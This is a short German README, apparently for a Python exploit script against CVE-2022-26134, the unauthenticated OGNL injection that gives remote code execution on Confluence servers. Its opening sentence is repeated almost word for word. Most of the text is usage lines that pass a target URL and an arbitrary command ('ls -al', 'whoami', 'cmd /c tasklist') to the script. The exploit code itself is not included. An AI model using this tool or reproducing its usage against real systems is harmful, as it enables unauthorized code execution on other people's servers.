
(CVE-2022-26134)eine nicht authentifizierte Remote-OGNL-Injection-Schwachstelle, die zu Codeausführung im Kontext des Confluence-Servers führt.
(CVE-2022-26134)eine nicht authentifizierte und entfernte OGNL-Injection-Schwachstelle, die zur Codeausführung im Kontext des Confluence-Servers führt
Erforderlich: Python2 oder Python3
Verwendung:
python cve_2022_26134.py -url target_url -cmd "ls -al"
python cve_2022_26134.py -url target_url -cmd "whoami"

Wenn das Ziel ein Windows-System ist, verwenden Sie bitte das Skript wie folgt, zum Beispiel:
python3 cve_2022_26134.py -url target_url -cmd "cmd /c tasklist"
